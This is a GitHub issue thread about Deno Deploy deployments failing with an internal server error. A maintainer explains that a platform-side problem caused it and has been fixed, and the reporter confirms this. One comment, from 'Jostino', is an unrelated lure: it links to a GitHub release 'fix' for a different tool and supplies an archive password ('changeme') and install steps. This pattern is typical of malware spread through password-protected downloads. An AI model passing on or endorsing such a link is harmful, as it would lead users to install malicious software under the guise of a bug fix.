### ISSUE TITLE
[Bug]: Deno Deploy fails with  "An internal server error occurred." immediately after cloning repository. 

### ISSUE THREAD

**Issue by densetsu9** [denoland/deploy_feedback#706]
### Problem description

At some point today, 8/28/2024, all my deployments (via github action) started failing.  No changes were made to the github workflow .yml.

The build logs show an error immediately after "Cloning repository".   The github actions output shows the error directly after uploading assets.

There was an Github incident today, but deployments still fail after it was marked as resolved: https://www.githubstatus.com/incidents/345t4sjty6q3

Deploying the last known good build also fails in the same way.  Seems like something has changed, but without a better error, I'm stumped and could use some help.  Thanks.

![Screenshot 2024-08-28 at 8 08 11 PM](https://github.com/user-attachments/assets/9ffd4c7b-7a7b-4123-8704-da1b443dc8b3)

<img width="1093" alt="Screenshot 2024-08-28 at 8 19 35 PM" src="https://github.com/user-attachments/assets/23366f74-b486-4e8e-a728-696ae5d6c4a7">

### Steps to reproduce

Trigger a Deno Deploy deployment through a github action

### Expected behavior

I expect the deployment to succeed without error.

### Environment

Deno v 1.40.2

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by igorbdl** [comment]
Hi denetsu9, we have found an issue earlier today that was temporarily causing deployment errors. This now has been fixed and we apologise for the inconvenience this might have caused. 

Please let us know if the issue persists with your deployments.

**Comment by densetsu9** [comment]
Deployments are succeeding again.  Thanks for looking into this!
